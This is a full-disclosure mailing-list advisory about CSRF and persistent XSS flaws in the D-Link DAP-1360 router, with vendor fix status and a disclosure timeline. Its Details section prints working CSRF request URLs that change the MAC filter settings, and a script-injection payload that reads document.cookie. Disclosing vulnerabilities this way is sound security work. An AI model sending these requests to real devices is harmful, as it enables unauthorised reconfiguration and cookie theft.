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Message-ID: <003101d00a70$d1e2a1d0$9b7a6fd5@pc>
Date: Thu, 27 Nov 2014 20:34:03 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] CSRF and XSS vulnerabilities in D-Link DAP-1360

Hello list!

There are Cross-Site Request Forgery and Cross-Site Scripting 
vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).

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Affected products:
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Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model 
with other firmware versions also must be vulnerable.

D-Link will fix these vulnerabilities in the next version of firmware (will 
be released in November), as they answered me in October. But in November 
they answered me, that firmware still was not publicly released due to the 
bugs and they need to work on it.

I tested model DAP-1360/B/D1B. There are three models of DAP-1360:

DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities 
in new firmware, which will be released in November.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes 
fixes for the vulnerabilities.

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Details:
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In section Wi-Fi - MAC filter - Filter mode it's possible to change 
parameter MAC filter restrict mode:

Disabled:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:0}]}

Allow:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:1}]}

Deny:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=40&res_struct_size=0&res_buf={%22mbssid%22:[{%22AccessPolicy%22:2}]}

In section Wi-Fi - MAC filter - MAC addresses it's possible to add and 
remove MAC addresses:

Add:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

Remove:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=44&res_struct_size=0&res_buf=[%2200:00:00:00:00:00%22]

XSS (persistent XSS) (WASC-08):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=41&res_struct_size=0&res_buf=[%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22]

Code will execute at http://192.168.0.50/index.cgi#wifi/mac.

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Timeline:
------------

2014.05.22 - informed developer about multiple vulnerabilities.
2014.06.21 - announced at my site about new vulnerabilities in DAP-1360.
2014.11.26 - disclosed at my site (http://websecurity.com.ua/7215/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



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